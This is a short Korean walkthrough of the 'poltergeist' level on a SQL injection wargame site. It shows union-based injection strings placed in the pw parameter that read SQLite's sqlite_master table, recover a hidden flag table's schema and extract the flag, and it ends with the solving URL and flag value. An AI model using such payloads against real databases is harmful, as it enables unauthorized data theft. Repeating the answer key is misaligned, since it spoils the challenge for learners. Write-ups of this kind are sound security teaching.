poltergeist

첫 화면이다.

SQLite는 데이터베이스의 schema를 sqlite_master라는 테이블에 저장한다.

아래와 같이 pw에 ' union select tbl_name from sqlite_master-- 를 넣어 flag_{$hash} 테이블의 정확한 이름을 알 수 있다.

아래와 같이 pw에 ' union select sql from sqlite_master where tbl_name='flag_70c81d99'-- 를 넣어 flag_70c81d99 테이블에 해당하는 sql 컬럼의 값을 알 수 있다.

sql 컬럼은 해당 테이블을 생성하는 쿼리를 저장한다.

아래와 같이 pw에 ' union select flag_0876285c from flag_70c81d99-- 를 넣어 flag_70c81d99 테이블의 flag_0876285c 컬럼의 값을 알 수 있다.

이 값이 $poltergeistFlag 이므로 https://los.rubiya.kr/chall/poltergeist_a62c7abc7e6ce0080dbf0e14a07d1f1d.php?pw=FLAG{ea5d3bbdcc4aec9abe4a6a9f66eaaa13} 에 접속하면 문제가 풀린다.